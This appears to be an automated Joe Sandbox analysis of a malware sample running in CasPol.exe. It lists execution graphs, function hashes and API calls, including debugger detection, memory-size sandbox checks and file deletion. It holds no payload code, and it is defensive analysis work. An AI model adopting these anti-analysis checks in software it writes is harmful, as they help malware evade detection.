                                                                                                                                                                                                                                                    execution_graph 27013 cc70c8 27014 cc710c CheckRemoteDebuggerPresent 27013->27014 27015 cc714e 27014->27015 27016 cc098b 27018 cc084e 27016->27018 27017 cc091b 27018->27016 27018->27017 27020 cc137f 27018->27020 27021 cc1372 27020->27021 27023 cc138b 27020->27023 27021->27018 27022 cc14be 27022->27018 27023->27022 27030 cc8620 27023->27030 27035 cc82da 27023->27035 27040 cc8161 27023->27040 27045 cc8170 27023->27045 27050 cc829c 27023->27050 27055 cc8339 27023->27055 27031 cc862a 27030->27031 27032 cc8644 27031->27032 27060 628fa20 27031->27060 27065 628fa30 27031->27065 27032->27023 27036 cc82df 27035->27036 27070 cc83d8 27036->27070 27074 cc83e8 27036->27074 27037 cc83cb 27037->27023 27042 cc8170 27040->27042 27041 cc83cb 27041->27023 27042->27041 27043 cc83d8 DeleteFileW 27042->27043 27044 cc83e8 DeleteFileW 27042->27044 27043->27041 27044->27041 27047 cc8189 27045->27047 27046 cc83cb 27046->27023 27047->27046 27048 cc83d8 DeleteFileW 27047->27048 27049 cc83e8 DeleteFileW 27047->27049 27048->27046 27049->27046 27052 cc82a1 27050->27052 27051 cc83cb 27051->27023 27053 cc83d8 DeleteFileW 27052->27053 27054 cc83e8 DeleteFileW 27052->27054 27053->27051 27054->27051 27056 cc833e 27055->27056 27058 cc83d8 DeleteFileW 27056->27058 27059 cc83e8 DeleteFileW 27056->27059 27057 cc83cb 27057->27023 27058->27057 27059->27057 27062 628fa30 27060->27062 27061 628fc5a 27061->27032 27062->27061 27063 628fc70 GlobalMemoryStatusEx GlobalMemoryStatusEx 27062->27063 27064 628fc80 GlobalMemoryStatusEx GlobalMemoryStatusEx 27062->27064 27063->27062 27064->27062 27067 628fa45 27065->27067 27066 628fc5a 27066->27032 27067->27066 27068 628fc70 GlobalMemoryStatusEx GlobalMemoryStatusEx 27067->27068 27069 628fc80 GlobalMemoryStatusEx GlobalMemoryStatusEx 27067->27069 27068->27067 27069->27067 27072 cc83f8 27070->27072 27071 cc842a 27071->27037 27072->27071 27078 cc7784 27072->27078 27076 cc83f8 27074->27076 27075 cc842a 27075->27037 27076->27075 27077 cc7784 DeleteFileW 27076->27077 27077->27075 27079 cc8448 DeleteFileW 27078->27079 27081 cc84c7 27079->27081 27081->27071

                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                    Function 062855A8 Relevance: 1.8, Strings: 1, Instructions: 596COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 601 62855a8-62855c5 602 62855c7-62855ca 601->602 603 62855d0-62855d3 602->603 604 62856f2-62856fb 602->604 607 62855f0-62855f3 603->607 608 62855d5-62855eb 603->608 605 628572d-6285736 604->605 606 62856fd 604->606 610 6285738-6285740 605->610 611 628577d-62857ab 605->611 609 6285702-6285705 606->609 612 62855fd-6285600 607->612 613 62855f5-62855f8 607->613 608->607 614 628571b-628571e 609->614 615 6285707-6285716 609->615 610->611 617 6285742-6285752 610->617 637 62857b5-62857b8 611->637 618 6285602-6285605 612->618 619 6285645-628564b 612->619 613->612 621 6285728-628572b 614->621 622 6285720-6285723 614->622 615->614 617->611 625 6285754-6285758 617->625 626 6285629-628562c 618->626 627 6285607-6285624 618->627 623 628564d 619->623 624 6285686-6285690 619->624 621->605 631 628575d-628575f 621->631 622->621 632 6285652-6285655 623->632 636 6285697-6285699 624->636 625->631 628 628562e-628563b 626->628 629 6285640-6285643 626->629 627->626 628->629 629->619 629->632 633 6285761 631->633 634 6285766-6285769 631->634 638 628565f-6285662 632->638 639 6285657-628565a 632->639 633->634 634->602 640 628576f-628577c 634->640 641 628569e-62856a1 636->641 643 62857da-62857dd 637->643 644 62857ba-62857be 637->644 645 6285670-6285673 638->645 646 6285664-6285669 638->646 639->638 650 62856ab-62856ae 641->650 651 62856a3-62856a8 641->651 654 62857df-62857e6 643->654 655 62857f1-62857f4 643->655 652 62858aa-62858b4 644->652 653 62857c4-62857cc 644->653 647 6285681-6285684 645->647 648 6285675-628567c 645->648 646->613 656 628566b 646->656 647->624 647->641 648->647 657 62856bf-62856c2 650->657 658 62856b0-62856b4 650->658 651->650 677 62858e4 652->677 678 62858b6-62858e2 652->678 653->652 659 62857d2-62857d5 653->659 660 62857ec 654->660 661 62858a2-62858a9 654->661 662 6285816-6285819 655->662 663 62857f6-62857fa 655->663 656->645 669 62856de-62856e1 657->669 670 62856c4-62856d9 657->670 658->640 667 62856ba 658->667 659->643 660->655 665 628581b-628581f 662->665 666 6285837-628583a 662->666 663->652 664 6285800-6285808 663->664 664->652 673 628580e-6285811 664->673 665->652 674 6285825-628582d 665->674 675 628583c-6285843 666->675 676 6285844-6285847 666->676 667->657 671 62856ed-62856f0 669->671 672 62856e3-62856ec 669->672 670->669 671->604 671->609 673->662 674->652 679 628582f-6285832 674->679 680 6285858-628585b 676->680 681 6285849-6285853 676->681 682 62858e6-62858e9 677->682 678->677 679->666 684 628585d-628586e 680->684 685 6285873-6285876 680->685 681->680 686 62858eb-62858fe 682->686 687 6285901-6285904 682->687 684->685 688 6285878-628587c 685->688 689 6285890-6285892 685->689 690 628590e-6285911 687->690 691 6285906-628590b 687->691 688->652 694 628587e-6285886 688->694 697 6285899-628589c 689->697 698 6285894 689->698 695 628592b-628592e 690->695 696 6285913-6285924 690->696 691->690 694->652 700 6285888-628588b 694->700 701 628593c-628593f 695->701 702 6285930-6285937 695->702 708 628599d-62859a4 696->708 709 6285926 696->709 697->637 697->661 698->697 700->689 704 6285959-628595c 701->704 705 6285941-6285952 701->705 702->701 706 628595e-6285961 704->706 707 62859b2-6285b46 704->707 705->708 717 6285954 705->717 710 628597b-628597e 706->710 711 6285963-6285974 706->711 752 6285c7c-6285c8f 707->752 753 6285b4c-6285b53 707->753 712 62859a9-62859ac 708->712 709->695 714 6285998-628599b 710->714 715 6285980-6285991 710->715 711->696 722 6285976 711->722 712->707 716 6285c92-6285c95 712->716 714->708 714->712 715->708 728 6285993 715->728 716->707 720 6285c9b-6285c9e 716->720 717->704 724 6285cbc-6285cbe 720->724 725 6285ca0-6285cb1 720->725 722->710 726 6285cc0 724->726 727 6285cc5-6285cc8 724->727 725->686 732 6285cb7 725->732 726->727 727->682 729 6285cce-6285cd7 727->729 728->714 732->724 754 6285b59-6285b8c 753->754 755 6285c07-6285c0e 753->755 765 6285b8e 754->765 766 6285b91-6285bd2 754->766 755->752 756 6285c10-6285c43 755->756 768 6285c48-6285c75 756->768 769 6285c45 756->769 765->766 777 6285bea-6285bf1 766->777 778 6285bd4-6285be5 766->778 768->729 769->768 780 6285bf9-6285bfb 777->780 778->729 780->729
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: $
                                                                                                                                                                                                                                                    • API String ID: 0-3993045852
                                                                                                                                                                                                                                                    • Opcode ID: d5517ab7a709cad89dc3dfdfbce47b8362b53f7ce9169fa39ed508b1321f834c
                                                                                                                                                                                                                                                    • Instruction ID: 103caab51c06931e688e02bc9875b4f0ae972c63a92a34bc3a831f52ef90114d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5517ab7a709cad89dc3dfdfbce47b8362b53f7ce9169fa39ed508b1321f834c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8422D475E212158FDFA0DB65C8806AEBBB2FF84310F248466E815BB395DA35DC41CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06282360 Relevance: 1.5, Instructions: 1493COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 9d2dd82df96e657a77cd3cd1d2e52b6c41679dcd7255321be7e1f84ecd689c97
                                                                                                                                                                                                                                                    • Instruction ID: bd5d48c789b9d187db1898ab7c0cc0944ba397d228bf70a03824ad3a8aa32427
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d2dd82df96e657a77cd3cd1d2e52b6c41679dcd7255321be7e1f84ecd689c97
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25D23A34E11205CFDB64EB68C894A9DB7B2FF89310F5485A9D809AB391DB35ED85CF80
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 062865E8 Relevance: .8, Instructions: 817COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 9d887ea54449ef898708b85527592c2f9d613428e444e37b8977ebf94fdae671
                                                                                                                                                                                                                                                    • Instruction ID: 13ff1e249bc34b24e3019010273435072a89be2c9f898e1c1e6d87ae3f7631ca
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d887ea54449ef898708b85527592c2f9d613428e444e37b8977ebf94fdae671
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C062A230A212059FDB54EB68D994BADBBF2FF85314F148469E806DB391DB35EC46CB80
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0628B228 Relevance: .8, Instructions: 773COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: bab528c891fc92a2fabff8fbb0678f8bf3b88e46da623b9831a0d59a165bf180
                                                                                                                                                                                                                                                    • Instruction ID: 93ead41384319ab09f8400a53772621cca03a039ae448a2354ccca4cfb59a1d4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bab528c891fc92a2fabff8fbb0678f8bf3b88e46da623b9831a0d59a165bf180
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D527470E2120A8FDF64EB68D8907ADB7B1FB45311F64842EE805EB395DA34EC85CB51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0628C170 Relevance: .6, Instructions: 643COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 491af377eca11b375c21b00cd949cc00b5738cacd6ec13ff1fd8aaf907d3eadf
                                                                                                                                                                                                                                                    • Instruction ID: 87732d86620ca9514318bd086ae13e690ca1ff4ed440b357a6883f7023cf3998
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 491af377eca11b375c21b00cd949cc00b5738cacd6ec13ff1fd8aaf907d3eadf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B832C571F212059FDB54EB68D890BADB7B6FB89310F508525E805E7385DB34EC42CBA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06287D78 Relevance: .5, Instructions: 473COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 27c4e75881658ad95f4147635d6896c5a4c1b9a94c0ace433adac692fd59c503
                                                                                                                                                                                                                                                    • Instruction ID: ae5425eefff394ce205e13cc733c152cb83ef2c318f72a0f04afba9379b2f320
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 27c4e75881658ad95f4147635d6896c5a4c1b9a94c0ace433adac692fd59c503
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9402BF30B212098FDB54EB68D8907AEBBE2FF85304F648569D805DB385DB75EC46CB90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00CCF438 Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 913 ccf438-ccf461 916 ccf467-ccf4f4 GlobalMemoryStatusEx 913->916 917 ccf463-ccf466 913->917 921 ccf4fd-ccf525 916->921 922 ccf4f6-ccf4fc 916->922 922->921
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 00CCF4E7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1622320992.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_cc0000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: GlobalMemoryStatus
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1890195054-0
                                                                                                                                                                                                                                                    • Opcode ID: 8135ed975ccffa4d19d9b6b71f2e9f16e91735140985b4c886b2c6f428fb59e7
                                                                                                                                                                                                                                                    • Instruction ID: c1148fdff5def0254ee4c35e5634c6f515b217fbcf3421163f6a17a96552db61
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8135ed975ccffa4d19d9b6b71f2e9f16e91735140985b4c886b2c6f428fb59e7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6121ABB1C002599FDB14CFAAE841BDEBBF4EF49320F15856AD814A7341D7789942CFA0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00CC70C1 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1430 cc70c1-cc714c CheckRemoteDebuggerPresent 1433 cc714e-cc7154 1430->1433 1434 cc7155-cc7190 1430->1434 1433->1434
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 00CC713F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1622320992.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_cc0000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3662101638-0
                                                                                                                                                                                                                                                    • Opcode ID: 5285127329da9cc921cc6691cf0d4cd5631123bb413a7fda298e33fb8c63189c
                                                                                                                                                                                                                                                    • Instruction ID: 358f3777a87860f6f67cdfc4e168ea90e1e2f5b80a9e12ba0c9c01c82a8549cc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5285127329da9cc921cc6691cf0d4cd5631123bb413a7fda298e33fb8c63189c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52217AB19003598FCB14CF9AC484BEEBBF5EF49310F14846AE459A7241D778A944CF60
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00CC70C8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1437 cc70c8-cc714c CheckRemoteDebuggerPresent 1439 cc714e-cc7154 1437->1439 1440 cc7155-cc7190 1437->1440 1439->1440
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 00CC713F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1622320992.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_cc0000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3662101638-0
                                                                                                                                                                                                                                                    • Opcode ID: f8ed56703a08a450b12081c03d6899d7d5aff5f3008148260c803d0c04d2e51a
                                                                                                                                                                                                                                                    • Instruction ID: af20eaf65cc2fff49197c37f8eab574fe41196f7e00eb3362d1d400438fc36b3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f8ed56703a08a450b12081c03d6899d7d5aff5f3008148260c803d0c04d2e51a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D2148B18002598FCB14CF9AD484BEEBBF5EF49310F14845AE859A3240D778A944CF60
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00CC7784 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1443 cc7784-cc8492 1446 cc849a-cc84c5 DeleteFileW 1443->1446 1447 cc8494-cc8497 1443->1447 1448 cc84ce-cc84f6 1446->1448 1449 cc84c7-cc84cd 1446->1449 1447->1446 1449->1448
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 00CC84B8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1622320992.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_cc0000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DeleteFile
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4033686569-0
                                                                                                                                                                                                                                                    • Opcode ID: d796f6b14a7bfb22025e0bb7660e8659b71e1520f593e13d966c171a7d1dd676
                                                                                                                                                                                                                                                    • Instruction ID: 61931d80f15f7e554c3291a097c0db11f6ebc4ce8187cde99e3d20d02c04ad42
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d796f6b14a7bfb22025e0bb7660e8659b71e1520f593e13d966c171a7d1dd676
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F52127B1C0061A9BDB14DF9AC544BEEFBB4EB48320F148169E818A7241D778A945CFA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00CC8441 Relevance: 1.6, APIs: 1, Instructions: 58fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1452 cc8441-cc8492 1455 cc849a-cc84c5 DeleteFileW 1452->1455 1456 cc8494-cc8497 1452->1456 1457 cc84ce-cc84f6 1455->1457 1458 cc84c7-cc84cd 1455->1458 1456->1455 1458->1457
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 00CC84B8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1622320992.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_cc0000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DeleteFile
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4033686569-0
                                                                                                                                                                                                                                                    • Opcode ID: 61c01d0fc3f1e5391615ad03428144506956bf8a30ecb5de33bf2f43aabd162c
                                                                                                                                                                                                                                                    • Instruction ID: 2054bce0baa37694045b0f06485df1d10ffc3e2062f590166be8cf3d73a9a392
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61c01d0fc3f1e5391615ad03428144506956bf8a30ecb5de33bf2f43aabd162c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 042158B1C0065A9BCB14CF9AC444BEEFBF4EF08320F148129D818A7240D778A945CFA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00CCF480 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1461 ccf480-ccf4f4 GlobalMemoryStatusEx 1463 ccf4fd-ccf525 1461->1463 1464 ccf4f6-ccf4fc 1461->1464 1464->1463
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 00CCF4E7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1622320992.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_cc0000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: GlobalMemoryStatus
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1890195054-0
                                                                                                                                                                                                                                                    • Opcode ID: 023e6cb28fea6a5f2fcd494a618622746f8f127b408d8d866cd595739ee4c3aa
                                                                                                                                                                                                                                                    • Instruction ID: 4744e17b5bc337ea8d333e663bbfd98f1ce98ba4167cbeec924e167ab8251e90
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 023e6cb28fea6a5f2fcd494a618622746f8f127b408d8d866cd595739ee4c3aa
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD1123B1C0065A9BDB14DF9AD444BDEFBF5AF48320F14816AD818A7240D378A945CFA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0628FEC3 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 2046 628fec3-628fefe 2060 628ff01 call ccef00 2046->2060 2061 628ff01 call ccef10 2046->2061 2048 628ff07-628ff26 2052 628ff2e-628ff58 2048->2052 2055 628ff79 2052->2055 2056 628ff5a-628ff77 2052->2056 2057 628ff8b-628ff92 2055->2057 2056->2057 2060->2048 2061->2048
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: |
                                                                                                                                                                                                                                                    • API String ID: 0-2343686810
                                                                                                                                                                                                                                                    • Opcode ID: bde22dbb0500a90ad5e4052edf88ea8acb6ad10fa3dfe72e1accb39ec05cf2ea
                                                                                                                                                                                                                                                    • Instruction ID: 37117c9aec1fc23daf5c1177d6022d45f63d31d215c6c6a8a844bb0019314a3c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bde22dbb0500a90ad5e4052edf88ea8acb6ad10fa3dfe72e1accb39ec05cf2ea
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75219F71B043509FDB549B78C819B6E7FF1AF49700F1544AAE94ADB391DB38AC00CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0628FEE0 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 2062 628fee0-628fefe 2075 628ff01 call ccef00 2062->2075 2076 628ff01 call ccef10 2062->2076 2063 628ff07-628ff26 2067 628ff2e-628ff58 2063->2067 2070 628ff79 2067->2070 2071 628ff5a-628ff77 2067->2071 2072 628ff8b-628ff92 2070->2072 2071->2072 2075->2063 2076->2063
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: |
                                                                                                                                                                                                                                                    • API String ID: 0-2343686810
